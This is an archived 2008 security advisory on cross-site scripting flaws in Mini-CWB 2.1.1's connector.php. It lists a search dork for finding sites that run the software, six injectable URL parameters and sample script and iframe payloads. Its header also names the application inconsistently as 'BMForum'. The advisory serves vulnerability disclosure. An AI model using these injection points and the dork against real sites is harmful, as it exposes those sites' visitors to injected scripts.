Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Excuse Online (pwd) SQL Injection Vulnerability

  phpFix v2 Multiple SQL Injection Vulnerability

  Class System v2.3 Multiple Remote Vulnerabilities

  Ablespace 1.0 'cat_id' Parameter SQL Injection Vulnerability

From:tan_prathan_(at)_hotmail.com <tan_prathan_(at)_hotmail.com>
Date:27.05.2008
Subject:Mini-CWB <= 2.1.1 Remote XSS Vulnerability

==========================================================
     Mini-CWB <= 2.1.1 Remote XSS Vulnerability             
==========================================================


AUTHOR : CWH Underground
DATE   : 25 May 2008
SITE   : www.citec.us


#####################################################
APPLICATION : BMForum
VERSION     : <= 2.1.1 (Lastest Version)
VENDOR      : http://www.mini-open-cms.com
DOWNLOAD    : http://www.mini-open-cms.com/download/Mini-CWB-2.1.1.zip
#####################################################

DORK: "powered by mini-cwb"

---Multiple XSS Exploit in 'connector.php'---

[-]
http:
//[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/con
nectors/php/connector.php?errcontext=<XSS>
[-]
http:
//[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/con
nectors/php/connector.php?_GET=<XSS>
[-]
http:
//[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/con
nectors/php/connector.php?_POST=<XSS>
[-]
http:
//[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/con
nectors/php/connector.php?_SESSION=<XSS>
[-]
http:
//[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/con
nectors/php/connector.php?_SERVER=<XSS>
[-]
http:
//[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/con
nectors/php/connector.php?fckphp_config[Debug_SERVER]=<XSS>


Example for XSS :
       <script>alert(123);</script>
       <iframe src=http://www.google.com>                                                          

################################################################
Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  
################################################################

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server